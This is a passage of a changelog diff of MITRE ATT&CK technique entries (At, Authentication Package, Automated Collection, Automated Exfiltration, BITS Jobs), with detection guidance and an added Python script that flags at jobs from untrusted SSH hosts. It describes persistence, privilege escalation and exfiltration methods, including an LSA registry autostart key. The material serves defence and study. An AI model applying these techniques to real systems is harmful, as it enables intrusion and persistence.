[at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at) Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM). In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-24 13:43:40.776000+00:00 | 2022-04-18 20:12:04.110000+00:00 |
| name | At (Windows) | At |
| description | Adversaries may abuse the at.exe utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. An adversary may use at.exe in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). Note: The at.exe command line utility has been deprecated in current versions of Windows in favor of schtasks. | Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at) Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM). In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at) |
| external_references[1]['source_name'] | Twitter Leoloobeek Scheduled Task | rowland linux at 2019 |
| external_references[1]['description'] | Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017. | Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021. |
| external_references[1]['url'] | https://twitter.com/leoloobeek/status/939248813465853953 | https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/ |
| external_references[2]['source_name'] | TechNet Forum Scheduled Task Operational Setting | GTFObins at |
| external_references[2]['description'] | Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017. | Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved September 28, 2021. |
| external_references[2]['url'] | https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen | https://gtfobins.github.io/gtfobins/at/ |
| external_references[3]['source_name'] | TechNet Scheduled Task Events | Linux at |
| external_references[3]['description'] | Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017. | IEEE/The Open Group. (2017). at(1p) — Linux manual page. Retrieved February 25, 2022. |
| external_references[3]['url'] | https://technet.microsoft.com/library/dd315590.aspx | https://man7.org/linux/man-pages/man1/at.1p.html |
| external_references[4]['source_name'] | Microsoft Scheduled Task Events Win10 | Twitter Leoloobeek Scheduled Task |
| external_references[4]['description'] | Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019. | Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017. |
| external_references[4]['url'] | https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events | https://twitter.com/leoloobeek/status/939248813465853953 |
| external_references[5]['source_name'] | TechNet Autoruns | Microsoft Scheduled Task Events Win10 |
| external_references[5]['description'] | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. | Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019. |
| external_references[5]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb963902 | https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events |
| x_mitre_data_sources[0] | Scheduled Job: Scheduled Job Creation | Process: Process Creation |
| x_mitre_data_sources[3] | Process: Process Creation | Scheduled Job: Scheduled Job Creation |
| x_mitre_detection | Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. | Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
In Linux and macOS environments, monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc.
Review all jobs using the atq command and ensure that the IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables (the machines that created the jobs) are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019)
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [Command and Control](https://attack.mitre.org/tactics/TA0011), learning details about the environment through [Discovery](https://attack.mitre.org/tactics/TA0007), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008). |
| x_mitre_version | 1.0 | 2.0 |
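As an added example (not code from the ATT&CK entry or the cited article), the following Python script applies the Linux check described above: it parses the job files that at(1) writes to its spool, recovers the SSH_CONNECTION / SSH_CLIENT values recorded at submission time, and flags jobs whose originating client address is not on an allowlist. The spool path, the trusted-host list and the sample job files are assumptions and constructed input.

```python
r"""Flag at(1) jobs whose SSH origin address is not a trusted host.
Added example, not code from the ATT&CK entry or the cited article. at(1)
records the submitter's environment in each job file, e.g.
    SSH_CONNECTION=10.0.0.5\ 50210\ 10.0.0.1\ 22; export SSH_CONNECTION
so the address that scheduled the job survives in the spool. Spool path,
trusted hosts and sample job texts are assumptions / constructed input.
"""
from __future__ import annotations

import ipaddress
import re
from pathlib import Path

AT_SPOOL = Path("/var/spool/cron/atjobs")  # Debian-family spool named in the ATT&CK text
TRUSTED_HOSTS = {"10.20.0.15", "10.20.0.16"}  # constructed allowlist of admin jump hosts

# Environment lines exactly as at(1) writes them: NAME=value; export NAME
_ENV_LINE = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)=(.*); export \1$")


def parse_at_env(job_text: str) -> dict[str, str]:
    """Recover the exported environment from an at job file, undoing the
    backslash escaping at(1) applies to spaces inside values."""
    env = {}
    for line in job_text.splitlines():
        m = _ENV_LINE.match(line)
        if m:
            env[m.group(1)] = m.group(2).replace("\\ ", " ")
    return env


def ssh_client_ip(env: dict[str, str]) -> str | None:
    """Client IP from SSH_CONNECTION or SSH_CLIENT (both start with
    "<client_ip> <client_port> ..."); None if not submitted over SSH."""
    for var in ("SSH_CONNECTION", "SSH_CLIENT"):
        fields = env.get(var, "").split()
        if fields:
            try:
                return str(ipaddress.ip_address(fields[0]))
            except ValueError:
                continue  # malformed value; try the other variable
    return None


def classify_job(job_text: str, trusted: set[str]) -> tuple[str, str | None]:
    """Return ('trusted' | 'untrusted' | 'no-ssh-origin', client_ip)."""
    ip = ssh_client_ip(parse_at_env(job_text))
    if ip is None:
        return "no-ssh-origin", None
    return ("trusted" if ip in trusted else "untrusted"), ip


def classify_jobs(jobs: dict[str, str], trusted: set[str]) -> dict[str, tuple[str, str | None]]:
    """Classify a mapping of job-file name -> job text (e.g. from read_spool)."""
    return {name: classify_job(text, trusted) for name, text in jobs.items()}


def read_spool(spool: Path = AT_SPOOL) -> dict[str, str]:
    """Load every job file in the spool (root needed); empty dict if unreadable."""
    try:
        return {p.name: p.read_text(errors="replace") for p in sorted(spool.iterdir())
                if p.is_file() and not p.name.startswith(".")}
    except OSError:
        return {}


# Constructed job files in the shape at(1) produces; not real captures.
SAMPLE_JOBS = {
    "a00001019f3e8a": r"""#!/bin/sh
# atrun uid=1000 gid=1000
SSH_CONNECTION=10.20.0.15\ 50210\ 10.20.0.1\ 22; export SSH_CONNECTION
SSH_CLIENT=10.20.0.15\ 50210\ 22; export SSH_CLIENT
HOME=/home/alice; export HOME
${SHELL:-/bin/sh} << 'marcinDELIMITER'
/usr/local/bin/nightly-report.sh
marcinDELIMITER
""",
    "a00002019f3e90": r"""#!/bin/sh
# atrun uid=1000 gid=1000
SSH_CONNECTION=198.51.100.77\ 41022\ 10.20.0.1\ 22; export SSH_CONNECTION
SSH_CLIENT=198.51.100.77\ 41022\ 22; export SSH_CLIENT
${SHELL:-/bin/sh} << 'marcinDELIMITER'
/tmp/.cache/update
marcinDELIMITER
""",
    "a00003019f3ea0": r"""#!/bin/sh
# atrun uid=0 gid=0
HOME=/root; export HOME
${SHELL:-/bin/sh} << 'marcinDELIMITER'
/usr/sbin/logrotate /etc/logrotate.conf
marcinDELIMITER
""",
}

if __name__ == "__main__":
    jobs = read_spool() or SAMPLE_JOBS  # off-box, fall back to the constructed sample
    for name, (verdict, ip) in classify_jobs(jobs, TRUSTED_HOSTS).items():
        print(f"{name}: {verdict}" + (f" (submitted from {ip})" if ip else ""))
```

Run as root on a host with the spool present to classify live jobs; without that access it falls back to the constructed sample, which yields one trusted, one untrusted and one console-submitted job.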
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'TechNet Scheduled Task Events', 'description': 'Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.', 'url': 'https://technet.microsoft.com/library/dd315590.aspx'} | |
| external_references | {'source_name': 'TechNet Autoruns', 'description': 'Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.', 'url': 'https://technet.microsoft.com/en-us/sysinternals/bb963902'} | |
| external_references | {'source_name': 'TechNet Forum Scheduled Task Operational Setting', 'description': 'Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.', 'url': 'https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen'} | |
| x_mitre_permissions_required | User | |
| x_mitre_platforms | Linux | |
| x_mitre_platforms | macOS |
| Old Description | New Description |
|---|---|
| Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages) Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. |
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 15:11:25.821000+00:00 | 2022-04-20 16:29:36.291000+00:00 |
| description | Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. |
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. |
| external_references[1]['source_name'] | MSDN Authentication Packages | Graeber 2014 |
| external_references[1]['description'] | Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017. | Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017. |
| external_references[1]['url'] | https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx | http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html |
| external_references[2]['source_name'] | Graeber 2014 | Microsoft Configure LSA |
| external_references[2]['description'] | Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017. | Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015. |
| external_references[2]['url'] | http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html | https://technet.microsoft.com/en-us/library/dn408187.aspx |
| external_references[3]['source_name'] | Microsoft Configure LSA | MSDN Authentication Packages |
| external_references[3]['description'] | Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015. | Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017. |
| external_references[3]['url'] | https://technet.microsoft.com/en-us/library/dn408187.aspx | https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Old Description | New Description |
|---|---|
| Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files. | Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Praetorian'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-31 22:18:43.019000+00:00 | 2022-04-11 18:40:24.795000+00:00 |
| description | Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files. | Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments. |
| x_mitre_data_sources[0] | File: File Access | Script: Script Execution |
| x_mitre_data_sources[2] | Script: Script Execution | File: File Access |
| x_mitre_detection | Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), as well as through cloud APIs and command line interfaces. |
| x_mitre_system_requirements[0] | Permissions to access directories and files that store information of interest. | Permissions to access directories, files, and API endpoints that store information of interest. |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | IaaS | |
| x_mitre_platforms | SaaS |
| Description |
|---|
| Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-16 15:23:38.940000+00:00 | 2022-04-19 22:50:14.956000+00:00 |
| x_mitre_data_sources[0] | Command: Command Execution | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[1] | Script: Script Execution | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Network Traffic: Network Connection Creation | Script: Script Execution |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Flow | File: File Access |
| x_mitre_data_sources[4] | Network Traffic: Network Traffic Content | Command: Command Execution |
| x_mitre_data_sources[5] | File: File Access | Network Traffic: Network Traffic Flow |
| Old Description | New Description |
|---|---|
| Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016) | Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. 
Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-13 21:36:04.956000+00:00 | 2022-09-14 19:21:26.447000+00:00 |
| description | Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016) | Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. 
Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) BITS upload functionalities 